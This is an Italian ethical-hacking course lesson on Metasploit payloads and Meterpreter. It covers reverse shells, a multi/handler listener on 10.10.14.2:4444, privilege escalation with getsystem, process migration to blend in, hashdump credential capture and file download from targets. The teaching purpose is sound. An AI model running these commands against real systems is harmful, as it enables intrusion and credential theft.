Payload e Meterpreter
Shell post-exploitation
Payload e Meterpreter è una lezione Ethical Hacking Academy gratuita su CoddyKit. Questa è la lezione 3 di 4. Puoi leggere la lezione completa qui gratuitamente — poi esercitati direttamente nel browser con un editor di codice integrato e un tutor IA disponibile 24/7. Fa parte del percorso di apprendimento Ethical Hacking Academy, e i tuoi progressi si sincronizzano tra il web e l'app CoddyKit. Il corso Ethical Hacking Academy include 4 lezioni in totale.
Che cos'è un payload?
Un payload è il codice che viene eseguito sul target dopo il successo di un exploit. Definisce le operazioni successive possibili, dall'esecuzione di un singolo comando all'apertura di una shell interattiva completa.
La scelta del payload corretto dipende dal sistema operativo del target, dalla configurazione di rete e dal livello di accesso necessario.
Staged e stageless
I payload prevedono due modalità di distribuzione:
- Staged (noti la
/inmeterpreter/reverse_tcp): invia prima uno stub di piccole dimensioni, che scarica poi il payload completo. L'impatto iniziale è minore. - Stageless (noti il carattere
_inmeterpreter_reverse_tcp): l'intero payload viene distribuito in una sola volta. È più affidabile sulle reti instabili.
Shell bind e reverse
Esistono due direzioni di connessione:
- Bind shell: il target apre una porta e resta in attesa; lei si connette a essa. Spesso viene bloccata dai firewall.
- Reverse shell: il target si connette nuovamente a lei (LHOST/LPORT). In genere riesce a superare i firewall che consentono le connessioni in uscita.
Per questo motivo, i payload reverse sono spesso l'impostazione predefinita.
Alla scoperta di Meterpreter
Meterpreter è il payload avanzato di Metasploit. A differenza di una shell di comandi di base, viene eseguito in memoria, comunica tramite un canale crittografato e offre un ricco set di comandi per la post-exploitation.
Poiché evita di scrivere sul disco, è più discreto rispetto al rilascio di un eseguibile separato.
Comandi fondamentali di Meterpreter
Una volta ottenuta una sessione Meterpreter, alcuni comandi fondamentali consentono di orientarsi nel target.
sysinfo # OS, architecture, hostname
getuid # current user context
ps # running processes
pwd ls cd # filesystem navigationTrasferimento di file
Meterpreter trasferisce file tra il suo computer e il target tramite semplici comandi, utili per acquisire prove o predisporre strumenti nei test autorizzati.
download C:\\Users\\admin\\secret.txt /tmp/
upload /tmp/tool.exe C:\\Windows\\Temp\\Passaggio a una shell di sistema
Il comando shell porta da Meterpreter all'interprete dei comandi nativo del target (cmd.exe o /bin/sh) quando ha bisogno di eseguire direttamente comandi a livello di sistema operativo.
Digiti exit per tornare al prompt di Meterpreter senza perdere la sessione.
shell
# C:\> whoami
# exit -> back to meterpreterEscalation dei privilegi
Spesso si ottiene inizialmente un accesso con privilegi limitati. Meterpreter aiuta a eseguire l'escalation:
getsystemtenta tecniche note per ottenere i privilegi SYSTEM su Windows.- Il modulo post
local_exploit_suggesterconsiglia exploit locali per l'escalation dei privilegi sull'host.
Privilegi più elevati consentono di estrarre credenziali e ottenere un accesso più approfondito.
getsystem
run post/multi/recon/local_exploit_suggesterMigrazione dei processi
La sua sessione risiede all'interno di un processo. Se il processo è instabile o potrebbe essere terminato, esegua la migrate in un processo più stabile e di lunga durata per mantenere attiva la sessione.
Migrare in un processo che corrisponde al suo livello di privilegi aiuta anche a confondersi con l'attività legittima e può modificare il contesto dell'utente.
ps
migrate 1340 # migrate into a stable PIDMantenimento dell'accesso
Meterpreter include funzionalità per acquisire dati utili durante le valutazioni autorizzate, come hashdump per raccogliere gli hash delle password e gli strumenti keyscan per dimostrare l'impatto dell'acquisizione dell'input.
Usi queste funzionalità solo nell'ambito concordato e documenti ogni operazione nella relazione per il cliente.
hashdump
run post/windows/gather/checkvmHandler
Un payload reverse richiede un servizio in ascolto sul suo lato per intercettare la connessione. Il modulo multi/handler svolge questa funzione. Lo configuri con lo stesso payload, LHOST e LPORT usati per generare il payload.
È essenziale quando distribuisce un payload di msfvenom al di fuori della console: avvii prima l'handler, quindi attivi il payload sul target.
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.14.2
set LPORT 4444
exploit -jVerifica rapida
Scelga il payload in grado di aggirare un firewall restrittivo.
Riepilogo
Ha imparato a conoscere i payload e Meterpreter:
- I payload possono essere staged (/) o stageless (_), nonché bind o reverse; quelli reverse in genere superano più facilmente i firewall.
- Meterpreter viene eseguito in memoria tramite un canale crittografato e offre numerosi comandi.
- Attività fondamentali: sysinfo, getuid, ps, download/upload, shell.
- Esegua l'escalation con getsystem e local_exploit_suggester; usi migrate per la stabilità.
- Usi le funzionalità di raccolta solo nell'ambito autorizzato e documenti ogni operazione.
Prossimo argomento: moduli post-exploitation, pivoting e raccolta di dati.
Domande Frequenti
La lezione «Payload e Meterpreter» è gratuita?
Sì — il testo completo di «Payload e Meterpreter» è gratuito qui sul web. Per esercitarvi in modo interattivo (un editor di codice integrato e un tutor IA 24/7) e sbloccare il resto del corso Ethical Hacking Academy, passa a CoddyKit PRO. Il corso Ethical Hacking Academy include 4 lezioni in totale.
Cosa imparerò in «Payload e Meterpreter»?
Shell post-exploitation Eserciti Ethical Hacking Academy con codice pratico che esegui direttamente nel browser, e un tutor IA 24/7 risponde alle tue domande mentre lavori sulla lezione.
Ho bisogno di esperienza per iniziare Ethical Hacking Academy?
Non è richiesta alcuna esperienza precedente. Ethical Hacking Academy su CoddyKit è strutturato per principianti e studenti avanzati, quindi puoi iniziare da qui o dall'inizio e procedere al tuo ritmo. Questa è la lezione 3 di 4.
Quanto tempo richiede la lezione «Payload e Meterpreter»?
La maggior parte delle lezioni CoddyKit richiede circa 5–10 minuti. Ogni lezione è breve e interattiva, quindi fai progressi costanti e riprendi esattamente da dove hai lasciato su web e app.
Posso scrivere ed eseguire codice in questa lezione Ethical Hacking Academy?
Sì. Ogni lezione Ethical Hacking Academy include un editor di codice integrato, quindi scrivi ed esegui codice reale direttamente nel tuo browser e ricevi feedback istantaneo dall'IA — nessuna configurazione locale necessaria.
Tutte le lezioni di questo corso
- Architettura di Metasploit
- Ricerca e uso degli exploit
- Payload e Meterpreter
- Moduli post-exploitation